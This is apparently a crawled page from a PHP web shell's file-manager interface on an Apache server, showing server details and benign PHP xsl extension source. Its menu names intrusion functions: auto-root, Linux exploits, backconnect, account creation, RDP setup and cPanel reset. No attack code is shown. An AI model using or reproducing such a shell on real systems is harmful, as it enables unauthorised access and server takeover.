Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.133.113.101
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
82 /
src /
ext /
xsl /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
36
B
-rw-r--r--
config.m4
872
B
-rw-r--r--
config.w32
1.51
KB
-rw-r--r--
php_xsl.c
7.68
KB
-rw-r--r--
php_xsl.h
2.88
KB
-rw-r--r--
php_xsl.stub.php
1.61
KB
-rw-r--r--
php_xsl_arginfo.h
4.6
KB
-rw-r--r--
xsltprocessor.c
22.82
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php_xsl.stub.php
<?php /** @generate-class-entries */ class XSLTProcessor { /** * @param DOMDocument|SimpleXMLElement $stylesheet * @tentative-return-type */ public function importStylesheet(object $stylesheet): bool {} /** * @param DOMDocument|SimpleXMLElement $document * @tentative-return-type */ public function transformToDoc(object $document, ?string $returnClass = null): DOMDocument|false {} /** * @param DOMDocument|SimpleXMLElement $document * @tentative-return-type */ public function transformToUri(object $document, string $uri): int {} /** * @param DOMDocument|SimpleXMLElement $document * @tentative-return-type */ public function transformToXml(object $document): string|null|false {} /** @tentative-return-type */ public function setParameter(string $namespace, array|string $name, ?string $value = null): bool {} /** @tentative-return-type */ public function getParameter(string $namespace, string $name): string|false {} /** @tentative-return-type */ public function removeParameter(string $namespace, string $name): bool {} /** @tentative-return-type */ public function hasExsltSupport(): bool {} /** @tentative-return-type */ public function registerPHPFunctions(array|string|null $functions = null): void {} /** @return bool */ public function setProfiling(?string $filename) {} // TODO make the return type void /** @tentative-return-type */ public function setSecurityPrefs(int $preferences): int {} /** @tentative-return-type */ public function getSecurityPrefs(): int {} }
Close